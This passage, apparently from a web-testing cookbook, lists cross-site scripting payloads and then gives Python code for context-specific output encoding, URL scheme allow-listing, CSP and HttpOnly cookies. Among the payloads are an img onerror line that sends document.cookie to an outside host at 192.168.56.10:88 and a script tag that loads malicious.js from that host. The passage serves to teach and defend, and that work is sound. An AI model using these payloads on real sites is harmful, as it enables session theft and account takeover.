In this recipe, we used the <script> tag to inject a JavaScript code block into the page; however, this is not the only HTML tag we can use, especially with the additions made in HTML5, such as <video> and <audio>. Let's see some other payloads we could have used to exploit XSS:
- Triggering an error event on tags that take a src attribute, such as <img>, or a <source> child element, such as <audio> and <video>:
<img src=X onerror="javascript:document.write('<img src=&quot;http://192.168.56.10:88/img'+document.cookie+'&quot;>')">
(The inner double quotes are written as &quot; so that they do not terminate the onerror attribute value.)
Or, use the following:
<audio><source onerror="javascript:alert('XSS')">
Or, there is also this:
<video><source onerror="javascript:alert('XSS')">
- Injecting a <script> tag that loads an external JavaScript file:
<script src="http://192.168.56.10:88/malicious.js"></script>
- If the injected text lands inside an attribute value that is surrounded by double quotes ("), as in <input value="injectable_text">, we can close the value and add an event handler attribute. For example, replace injectable_text with the following. Notice that the final quote is left open so that the one already in the HTML closes it:
" onmouseover="javascript:alert('XSS')
- Injecting a link, or any other tag with an href attribute, so that code runs whenever it is clicked:
<a href="javascript:alert('XSS')">Click here</a>
There are a multitude of variations of tags, encodings, and instructions that can be used to exploit an XSS vulnerability. For a more complete reference, see the OWASP XSS Filter Evasion Cheat Sheet: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.
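Every payload in the list above depends on landing in a particular output context: between tags (the <img>, <script>, <audio> and <video> variants), inside a quoted attribute value (the " onmouseover=" variant), or inside an href (the javascript: variant). The defender's counterpart is therefore context-specific output encoding plus a scheme allow-list for URLs. The following Python is an added example, not code from the recipe or its target application: the render_unsafe/render_safe template functions, the encoders and the sample comment, value and link inputs are all constructed here for illustration.

```python
import html
from urllib.parse import urlsplit

# Constructed sample inputs (not from the recipe's target application): the payload
# shapes listed above, each paired with the output context it relies on.
SAMPLE_COMMENT = '<img src=X onerror="alert(1)">'   # lands between tags
SAMPLE_VALUE = '" onmouseover="alert(1)'            # lands in a quoted attribute value
SAMPLE_LINK = "javascript:alert('XSS')"             # lands in an href

ALLOWED_URL_SCHEMES = {"http", "https", "mailto"}


def encode_for_html_body(text: str) -> str:
    """Text placed between tags: turning < > & " ' into entities means the input
    can never open a tag, so <img ...>, <script ...>, <audio><source ...> and
    similar payloads are displayed literally instead of being parsed."""
    return html.escape(text, quote=True)


def encode_for_html_attribute(text: str) -> str:
    """Text placed inside an attribute value: the OWASP rule is to encode every
    non-alphanumeric character as &#xHH;, so the quote and the space that the
    '" onmouseover=...' payload needs to break out of the value never appear raw.
    This stays safe even if a developer forgets the surrounding quotes."""
    return "".join(c if c.isalnum() else f"&#x{ord(c):x};" for c in text)


def safe_href(url: str) -> str:
    """URL placed in an href: entity encoding does not help here, because a
    well-formed javascript: URL contains nothing that needs encoding. Instead,
    normalise the way the browser's URL parser does (leading/trailing whitespace
    dropped, tab/CR/LF ignored anywhere), allow-list the scheme, and only then
    attribute-encode the result. Unknown schemes become a harmless placeholder."""
    cleaned = "".join(ch for ch in url.strip() if ch not in "\t\r\n")
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme and scheme not in ALLOWED_URL_SCHEMES:
        return "#"
    return html.escape(cleaned, quote=True)


def render_unsafe(comment: str, value: str, link: str) -> str:
    """The vulnerable pattern: user input interpolated straight into markup."""
    return (
        f"<p>{comment}</p>\n"
        f'<input value="{value}">\n'
        f'<a href="{link}">Click here</a>'
    )


def render_safe(comment: str, value: str, link: str) -> str:
    """The same template with an encoder chosen per output context."""
    return (
        f"<p>{encode_for_html_body(comment)}</p>\n"
        f'<input value="{encode_for_html_attribute(value)}">\n'
        f'<a href="{safe_href(link)}">Click here</a>'
    )


def input_reaches_markup(rendered: str, raw: str) -> bool:
    """Self-check for a unit test: does the raw input survive unchanged in the
    rendered page? If it does, the browser will parse it as markup or script."""
    return raw in rendered


if __name__ == "__main__":
    print("--- unsafe ---")
    print(render_unsafe(SAMPLE_COMMENT, SAMPLE_VALUE, SAMPLE_LINK))
    print("--- safe ---")
    print(render_safe(SAMPLE_COMMENT, SAMPLE_VALUE, SAMPLE_LINK))
```

Running the module prints both renderings side by side; in the safe version the <img> payload is shown as text, the attribute payload stays inside the value, and the javascript: link is replaced by "#". Output encoding is the primary fix, but it is worth pairing it with a Content-Security-Policy (which blocks the external-script variant even if encoding is missed somewhere) and an HttpOnly flag on session cookies (which denies document.cookie to the cookie-stealing variant).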